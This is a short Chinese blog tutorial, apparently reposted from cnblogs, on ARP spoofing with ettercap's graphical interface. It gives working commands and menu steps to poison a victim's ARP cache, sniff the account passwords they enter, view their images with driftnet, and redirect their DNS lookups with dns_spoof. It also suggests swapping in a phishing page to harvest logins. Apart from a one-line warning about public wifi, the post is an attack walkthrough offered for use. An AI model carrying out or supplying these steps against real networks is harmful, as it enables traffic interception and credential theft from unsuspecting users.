• ARP欺骗之ettercap图形化界面


    ARP欺骗原理:

    在每台主机中都有ARP缓存表,缓存表中记录了IP地址与MAC地址的对应关系,而局域网数据传输依靠的是MAC地址(网络设备之间互相通信是用MAC地址而不是IP地址)


     一、ARP欺骗

    工具:ettercap(中间人攻击)

    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    cat /proc/sys/net/ipv4/ip_forward (配置ip转发功能)

     

    leafpad /etc/ettercap/etter.conf (修改配置文件)

    搜索iptables,去掉两个#号,即:

     

    ettercap -G(进入图形界面)
    
    Sniff -> Unified sniffing -> 确定

    扫描主机并查看主机列表

     

     

    将要欺骗的主机add to target1,网关add to target2

     

    Mitm -> ARP poisoning...

     

    开始嗅探

     

    Connections查看嗅探到的数据

     

    如果目标机在页面输入账号密码就会被捕获

     

    二、捕获图片数据

    工具:ettercap+driftnet

    ettercap -G(进入图形界面)

    重复上面的步骤

    开启新终端,输入命令:

    driftnet -i eth0

     

    在中间的窗口里捕获到图片,你可以看到目标机加载的图片

    三、DNS欺骗

    leafpad /etc/ettercap/etter.dns

    在微软处添加:

    www.baidu.com A 1.1.1.1

     

    ettercap -G(进入图形界面)

    重复之前的步骤ARP欺骗的步骤,在start sniffing之前添加一个插件

     

    双击启动dns_spoof

     

    开始嗅探后,我们在目标机中ping一下百度

     

    欺骗成功,如果将1.1.1.1改为钓鱼页面,就可以欺骗到用户账号密码

    最后提醒大家,连接公共wifi时一定要小心!

  • 相关阅读:
    vsftpd文件服务参数汇总和虚拟用户使用
    MHA实现mysql高可用复制集群
    mysqldump备份与基于bin-log实现完全恢复
    MySQL的日志相关内容
    MySQL(mariadb)主从复制模式与复制过滤
    MySQL(mariadb)多实例应用与多实例主从复制
    DNS的主从,转发与负载功能
    Spring 自动代理
    Jquery Validate 使用记坑
    动态代理
  • 原文地址:https://www.cnblogs.com/paperpen/p/10810690.html
Copyright © 2020-2023  润新知